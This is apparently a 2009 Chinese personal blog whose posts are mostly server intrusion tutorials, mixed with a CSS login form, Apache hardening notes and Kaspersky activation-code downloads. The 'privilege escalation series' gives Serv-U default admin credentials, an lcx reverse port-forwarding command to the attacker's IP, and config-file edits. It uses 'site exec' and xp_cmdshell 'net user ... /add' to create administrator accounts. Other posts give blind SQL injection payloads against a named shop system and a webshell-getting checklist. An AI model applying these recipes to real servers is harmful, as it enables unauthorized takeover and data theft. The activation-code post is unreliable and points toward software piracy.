adbrave的小站

serv-u ftp 转发端口（服务器提权系列之四）

2009-01-06T15:13:14+08:00

课程主要内容：利用webshell上传、执行功能，将默认serv-u ftp管理端口映射到外网，通过默认serv-u ftp连接密码，获得系统权限。
关键技术要点：serv-u ftp管理端口映射的详细方法。

serv-u默认监听127.0.0.1:43958,serv-u默认管理账号是LocalAdministrator,默认密码

是"#l@$ak#.lk;0@P"，在本机才能连接这个管理端口,但是如果我们可以把这个端口转发

到我们本机上,通过本机来连接远程主机的自连接端口,我们就能完全接管目标服务器的

SERV_U,建立有完全权限的帐号连接上去为所欲为,而在转发过程中我们并不需要有ADMIN

的权限,只要有运行端口转发工具的权限就可以了. #l@$ak#.lk;0@P

在目标WEBSHELL上运行LCX lcx -slave 你的IP 5000 127.0.0.1 43958

在本机上运行 lcx -listen 5000 21

打开本地的SERV_U 在IP上填入127.0.0.1 帐号写LocalAdministrator 密码#l@$ak#.lk;0@P

此时的连接过程是本机连接21端口------------>转发往本机5000端口-------------->管道连接至远程机5000端口------------>转发至远程43958端口

连接成功后,在本机登陆SERV_U就相当于登陆了远程的SERV_U

你可以FTP登陆本机IP,输入上面的帐号和密码,在远程FTP服务器上执行命令（执行命令格式请参考提权系列之三）

追查serv-u ftp帐户信息（服务器提权系列之三）

2009-01-06T10:26:41+08:00

    课程主要内容：通过webshell，分析serv-u ftp安装路径下的帐户密码信息，获得serv-u ftp的连接帐户密码，并通过修改serv-u ftp配置文件提权。

关键技术要点：修改serv-u ftp配置文件。

Serv-U FTP Serve在设置用户以后会把配置信息存储与ServUDaemon.ini文件中。包括用户的权限信息和可访问目录信息。本地受限用户或者是远程攻击者只要能够读写Serv-U FTP Serve的文件目录，就可以通过修改目录中的ServUDaemon.ini文件实现以Ftp进程在远程、本地系统上以FTP系统管理员权限来执行任意命令。并且不受系统版本的影响

假设本地受限用户可以浏览Serv-U FTP Serve的文件目录。找到ServUDaemon.ini文件。用记事本打开原文件大致内容为:
　　[GLOBAL]
　　Version=4.1.0.0        // Serv-U Ftp Server 版本号
　　ProcessID=584        //ser-U的进程号
     RegistrationKey=UEyz459waBR4lVRkIkh4dYw9f8v4J/         // Serv-U的注册码
     AHLvpOK8tqOkyz4D3wbymil1VkKjgdAelPDKSWM5doXJsgW64YIyPdo+wAGnUBuycB

　　[DOMAINS]　　Domain1=127.0.0.1||21|127.0.0.1|1|0 //主机IP以及域名,端口情况
　　[Domain1]　　//用户列表
     User1=hackgg|1|0
       User2=hadsgg|1|0
　　[USER=hackgg|1]       // 用户名
　　Password=rfE8DFBE3F7EC27FB043D4305A04E6D2C6       // 用户密码那
　　HomeDir=c:\       // 可以浏览的目录
　　TimeOut=600       // 超时时间
　　Access1=C:\|RWAMLCDP      // 中间有 | 符号分割，前面是用户目录，右面是用户权限

#必填.密码.算法为随机产生2个字符,如hr.将hr+明文密码(如test)使用MD5加密,如MD5("hrtest",生成密码后将所有小写字符变为大写
#在最前加上这两个随机字符"hr"+"1589A4F0334FDF55D52F26DFA2D3CCEB",生成最终密码

以下这一行是权限设置,解释一下各参数代表的含义
例子：Access1=g:\　RWAMELCDP
#必填.对于目录的存储权限,默认权限为RWAMLCDP.权限排列无需按照顺序.
# 格式 Access序号 = 目录　权限
#R 读取
#W 写入
#A 附加
#M 修改
#E 执行--由于安全原因,所有帐号均不能开启此权限
#L 目录列表
#C 建立目录
#D 删除目录
#P 将权限继承给子目录

ReloadSettings=True,
#在修改INI文件后需要在[GLOBAL]里加入上面那句代码（切忌）。这时SERV-U会自动刷新配置文件并生效,此项随之消失.再有修改再次添加（相当于重新启动了Serv-U）

建帐号成功后开始利用

ftp>cd system32 //进入system32目录

ftp>quote site exec net.exe user pchack 11111111 /add //利用系统的net.exe文件加用户。

ftp>quote site exec net.exe localhost administrators pchack /add //提升为超级用户

ftp>quote site exec 加程序名

Div+Css登陆窗体实现

2009-01-06T09:57:35+08:00

HTML表单

程序代码"/> 程序代码

aspx" method="post">


用户名：
密码：

form最后的id=block的div用来屏蔽后面的内容

css代码部分：

程序代码"/> 程序代码

/**//*登陆Form*/
#loginForm
{
     border:solid 1px #AED5FD;
     position:absolute;
     top:35%;
     left:40%;
     z-index:2000;
     background-color:#EAF4FE;
}
/**//*屏蔽Div*/
#block
{
     background-color:#CCCCCC;
      position:absolute;
      top:0px;
      left:0px;
     z-index:1000;
     display:block;
     width:100%;
     height:210%;
    /**//*设置屏蔽div的透明度*/
     filter : progid:DXImageTransform.Microsoft.Alpha ( enabled=true , style=0 , opacity=40);
     }

js代码：

程序代码"/> 程序代码

function ShowLogin()
{
var ele=document.getElementById("loginForm");
var block=document.getElementById("block");
ele.style.display="";
block.style.display="";
}
function Reset()
{
document.getElementById("loginForm").style.display="none";
document.getElementById("block").style.display="none";

}
window.onload=Reset();

apache2.2.8在windows2003下的安全设置

2009-01-05T23:29:43+08:00

众所周知，在windows下当Apache第一次被安装为服务后，它会以用户“System”(本地系统账号)运行。如果web服务器的所有资源都在本地系统上，这样做会问题比较少，但是将会具有很大的安全权限来影响本地机器，因此千万不能开启System帐号的网络权限！

于是要创建一个新的帐户来替代这个帐号启动apache并设置相应的权限：

1.在计算机管理里的本地用户和组里面创建一个帐户，例如：apache，密码设置为apacheuser，加入guests组（如果出现问题，可以赋予user权限）；

2.打开开始->管理工具->本地安全策略，在用户权限分配中选择“作为服务登陆”，添加apache用户；

3. 计算机管理里面选择服务，找到apache2.2，先停止服务，右击->属性，选择登陆，把单选框从本地系统帐户切换到此帐户，然后查找选择 apache，输入密码apacheuser，然后点确定（这个时候apache还不能正常启动，一般情况肯定会报错：Apache2.2 服务因 1 (0x1) 服务性错误而停止。）；

4.赋予apache安装目录（比如：D:/apache2.2）以及web目录（比如D: /wwwroot）apache帐号的可读写权限，去除各磁盘根目录除administror与system以外的所有权限，赋予apache安装目录所在的磁盘根目录apache帐户的可读取列目录权限（我开始觉得没必要，但后来发现：这是导致上面出错的关键。）

5.启动apache，一切OK了。

6.php.ini中指定的PHP临时上传目录和session保存目录，并给予目录apache完全控制权限，例如：
upload_tmp_dir = "D:/wwwroot/Tmp/uploadtmp/"
session.save_path = "D:/wwwroot/Tmp/sessiontmp/"

7.给予D:/php目录读取与运行的权限；

8.给予zend安装目录读取与运行的权限；

9.限制读取访问的目录，修改apache安装目录下conf文件夹下的httpd.conf，加上：
php_admin_value open_basedir "D:/wwwroot"
php_admin_value safe_mode On

好了...这下应该基本问题都解决了。突然发现我很落后，网上apache+win的文章好少啊，说明大家都不会把apache用在windows下，我寒啊...以至于今天权限配置花费我好多时间...摸索加整理...

谈点个人入侵的经验（转载）

2009-01-05T23:05:55+08:00

下面谈谈个人入侵的经验，不分语言，只谈拿webshell，至于提权，这里不说，我也很少提权，除非确实有必要！~

1.无论什么站，无论什么语言，我要渗透，第一件事就是扫目录，最好一下扫出个上传点，直接上传shell，诸位不要笑，有时候你花很久搞一个站，最后发现有个现成的上传点，而且很容易猜到，不过这种情况发生在asp居多！

2.asp（aspx）+MSSQL先考虑注入，一般的注入都有DBowner权限可以直接写shell；如果写不了，或者web与数据库分离，那就猜数据，从后台下手了，后台可以上传或者改配置文件；

3.asp（aspx）+ACCESS拿shell一般只有3种方法，一是前台上传或者注入进后台上传；二是注入进后台改配置文件；三是注入进后台备份数据库或者暴库后知道是asp或者asa数据库于是直接写一句话；

4.php+MYSQL 一般是注入进后台上传，偶尔运气好些权限够高可以注入select into outfile；然后包含，分本地与远程，远程包含在高版本php是不支持的，于是想办法本地上传图片文件或者写到log里；然后php程序某某未公开的漏洞，运气好可以直接写shell。

5.jsp+MYSQL利用数据库拿权限方面基本同php，而且jsp的上传基本很少检查文件后缀，于是只要有注入点与后台，拿shell相当的容易。jsp+ORACLE的站我碰到的不多，碰到的也是猜出用户名与密码从后台下手的。

6.无论什么大站，主站一般都很安全（不然早被人玩了），于是一般从二级域名下手，猜出主站的某些用户名与密码或者搞到主站的源代码，或者旁注得到同网段服务器后cain或arp。

7.一般的大站很少有用现成的CMS的，于是如果你有幸找到源码，那你就发了，注入漏洞啊，上传漏洞啊，写文件漏洞啊，都掌握在你手里。多看看那些大站新出来的测试分站点，那些站还在测试中，可以很轻松拿下。

8.上传有个文件名截断，这包括2个方面，一是00截断，二是长文件名截断（曾经利用这个搞下hw）；然后很多写文件的地方，都可以00，屡试不爽。上传别忘了.asp（当然.asa，.cer，.cdx都可以啦）目录的妙用。

9.php 站无论windows还是linux，都有magic_quotes_gpc的问题，magic_quotes_gpc为on的时候，在server变量注入的时候还是可以select into outfile，今年我搞过某未开源cms就是这个情况，一般情况下为on就别考虑写文件了，不过有这个权限别忘了读文件源码，因为load_file的参数是可以编码的。

10.猜路径或者文件在入侵中非常必要，猜不到路径的时候别忘了google（baidu太烂，google很全），于是你可以考虑看站点下的robot.txt或者robots.txt，会有惊喜。

11.工具的使用很重要，入侵之前用WVS扫扫会有助入侵；注入工具虽然很多，但不见得都好使，现在的软硬防火墙、防注入越来越厉害，那时候你就别偷懒，多手工有助你成长。

12.遇到过一流监控么，遇到其他防post的防火墙么，有时候一句话进去了都无法传大马，那时候，你先学学编码，学学变换绕过。

13.想搞一般的小站，记得查看这个小站的版权，找做这个站的公司，然后从这个公司做的其他站下手，得到源码再回头搞，我曾经通过这个方法拿下某知名制药的公司站。

14.旁注的思路永远不过时，遇到dbowner的注入，可以很舒服写shell到你需要的站，省得麻烦的提权了；运气不好，按部就班拿shell提权得到你所需。

15.永远别忘记社会工程学，利用社工把自己当成一个什么也不会的人，从某某站长的qq，身份证，邮箱等等下手，也许有时可能会有意外；另外别忘记admin,admin；test,test；123456,123456这种简单的尝试，当然，你也可以暴力破解。

16.别忽视XSS，别忽视cookie，XSS可以偷cookie，更有若干妙用，自己学会领悟；cookie可以伪造登陆，cookie可以注入，cookie注入可以绕绝大多数的防火墙。

17.平时搞站多多搜集路径啊，源码啊，工具啊，充实自己的“武器”库；最好把自己的入侵步骤记录下来，或者事后反思下，我一般都是记在txt里，另外要做到举一反三。

18.多学习，多看源码，多看公布出来的0day，脚本是入侵的前提，而不是工具，会用工具会装B你还没入门。

最后奉劝诸位有事没事改人家首页的装B者，出来混，迟早是要还的，别等进了局子再后悔。还有一点，就是我搞N多站，没挂过一个马，至于很多挂马的人，我不知道该说什么，因为大家都喜欢钱，但是还是少为之吧。

今天心头一热，把一些还记得的心得写出来了，希望大家别拍砖，入侵的时候思路是很灵活的，只要不死板，总有一条使自己成功的路。如果大家有什么不解或者疑问需要讨论，欢迎来http://www.oldjun.com讨论或者加我QQ。

还有不要抱着功利心去拿站，做安全的人靠不断拿站提升自己的技术与经验，也可以把自己的产品做的更好；若是急功近利或者为了什么利益，会...哎，不知道该怎么说...世人不知有因果，因果何曾饶过谁！

祝大家元旦快乐！

原文地址：http://www.oldjun.com/blog/index.php/archives/36/

追查SQL密码（服务器提权系列之二）

2009-01-05T22:48:19+08:00

概述：通过webshell，查询网站文件夹下的conn或者其他数据库连接文件，找出sa或者其他sql server连接帐户的密码，使用webshell中的数据库执行功能提权，或者使用外部连接数据库并执行的方式提权。

MSSQL的数据库帐户权限类似WINDWOS，简单来说可以分为SA，DB_OWNER,PCUBLIC等,SA 类似WINDWOS中的管理员帐号,DB_OWNER类似WINDOWS中,的SUPERUSER,

那么假设你得到了这个SA帐号,不是相当于得到了WINDOWS的管理员帐号吗?有了他,你能像WINDOWS的管理员一样,执行任何命令,包括建WINDOWS管理员的命令,,执行任何程序.

如何得到

通常网站的正常运转，提供信息服务依赖于数据库，MSSQL的数据库的连接是需要有一个用户帐号的，这个帐号保存在网站的某个文件中，这个文件通常为CONN。ASP。如果得到了WEBSEHLLL，可以打开这个文件看到连接数据库的帐号,假如是SA帐号,那么恭喜,你得到了一个利用可能性相当大的提权机会.

如何使用?
可以在WEBSEHLL中的数据库操作里利用,或者用外部的MSSQL连接器连接使用
Exec Master..Xp_CmdShell 'net user lovehk 12345678 /add' 数据库执行WINDOWS命令范例

关于windowsXP到底能不能安装iis6.0

2009-01-05T22:40:28+08:00

刚参与一个项目，是对ERP, CRM, WMS的整合，要用到Win Server 2003和BizTalk，我自己机器是装XP Pro SP2的，只有IIS6.0才能提供Web Service Application Pool，IIS5.1是没有这个功能的。所以到处找XP Pro装IIS6.0的方法。昨晚确认IIS6.0不能装在XP Pro上，所以只能使用VPC搞个win2003的镜像了。

补充下：以后各位如果在网上看到xp pro装iis6.0，那都是一传十十传百传开来的，而传的人自己也没验证过。网上的iis6.0安装包是在win2003安装iis6.0时"抠"出来的，这是为了方便装了2003但是没有win2003的光盘来装iis6.0的人，这个安装包只适合于在win2003下安装。而另外还有方法说通过win xp pro sp1光盘安装iis6.0，这是胡扯，因为通过这种方式安装，最后得到的是iis5.1。如果下载下来的安装包有Installer，那么这也是假的，安装好之后你会发现iis版本是5.1。微软官网上没提供iis6.0的安装包下载，只有iis6.0 manager for xp pro，3.7M的那个。

通过我的实践，iis6.0不能安装在xp pro中。

无法获得Web绝对路径的入侵方法（黑客攻防）

2009-01-05T22:03:48+08:00

我们很多情况下都遇到SQL注入可以列目录和运行命令，但是却很不容易找到web所在目录，也就不好得到一个webshell，这一招不错：

　　exec master.dbo.xp_cmdshell ’cscript C:\Interpub\AdminScripts\mkwebdir.vbs -c localhost -w "l" -v "win","c:\windows\system32"’

　　建立虚拟目录win,指向c:\windows\system32

　　exec master.dbo.xp_cmdshell ’cscript C:\Interpub\AdminScripts\adsutil.vbs w3svc/1/root/win/Accessexecute Ture’

　　让win句有解析asp 脚本权限

　　exec master.dbo.xp_cmdshell "cscript C:\Interpub\AdminScripts\adsutil.vbs delete w3svc/1/root/h4x0r/"

　　删除虚拟目录。

or注射经典

2009-01-05T21:30:37+08:00

以前搞ASP网站的朋友都是用明小子或者啊D 对ASP网站进行注射，但是如果ASP站点有防注射代码怎么办呢？那就用or注射。

记得一年前火狐有一位朋友问,如果一个站过滤了and和"'"的话，改怎么注入啊？当时我随口说了句"or注入"，后来又一次看贴的时候，看到他问我该怎么利用呢？我就写了几个简单的语句给他，叫他自己变换，他很感激我，还说网上没有这种方法。我到网上查了查，还真没有or注入专题呢（or 1=1除外），呵呵，所以，一年后的今天，就有了这篇文章。
我们用雷霆购物系统做or注入演示。我们先用or 1=1和or 1=2来测试是否存在注入点，我们先来看正常页面的面貌。我们现在用or 1=1测试是否存在注入漏洞。返回的是另外一个页面，我们再来测试or 1=2。返回的是正常的页面，说明猜测正确的时候是错误，猜测错误的时候是正常，这就是真正的"假是真时真是假"，比lake2大哥哥的IP欺骗更经典哦，呵呵。
我们来构造测试语句：

vpro.asp?id=1 or exists(select * from admin)
返回错误页面，说明存在admin表我们来换一个表试试！

vpro.asp?id=1 or exists(select * from n0h4ck)
说明不存在n0h4ck这个表。
我们继续来，构造语句

vpro.asp?id=1 or exists(select admin from admin)
返回or 1=1的页面，说明admin表存在admin字段。

vpro.asp?id=1 or exists(select padd from admin)
返回or 1=2的页面，说明admin表不存在padd字段。
我们现在开始猜测数据了，

vpro.asp?id=1 or (select mid(admin,1,1) from admin)='n'
返回or 1=2的页面，说明admin表admin字段的第一个数据的第一个字符不是"n"。
我们再来

vpro.asp?id=1 or (select mid(admin,1,1) from admin)='a'
返回or 1=1的页面，说明说明admin表admin字段的第一个数据的第一个字符是"a"，我们第一个会想到什么呢？当然是"admin"啦。
我们用left函数确定一下,

vpro.asp?id=1 or (select left(admin,5) from admin)='admin'
猜测正确，的确是admin，好了，后面的话就不用我说了吧！

11个卡巴斯基2009激活码

2009-01-05T20:55:35+08:00

今天发布11个卡巴斯基2009激活码，如图：

点击下载卡巴斯基2009激活码-1

点击下载卡巴斯基2009激活码-2

点击下载卡巴斯基2009激活码-3

如果激活码不好用或者过期请在此处留言，我会随时更换上可以用的卡巴斯基激活码! 谢谢支持！